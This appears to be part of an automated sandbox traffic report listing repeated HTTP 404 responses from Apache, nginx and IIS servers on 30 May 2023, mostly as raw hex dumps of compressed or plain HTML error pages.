3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:10:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 07:54:14 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:10:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 07:54:14 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 09:10:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 07:54:14 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:11:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:11:16 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:11:19 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 30 May 2023 09:11:22 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 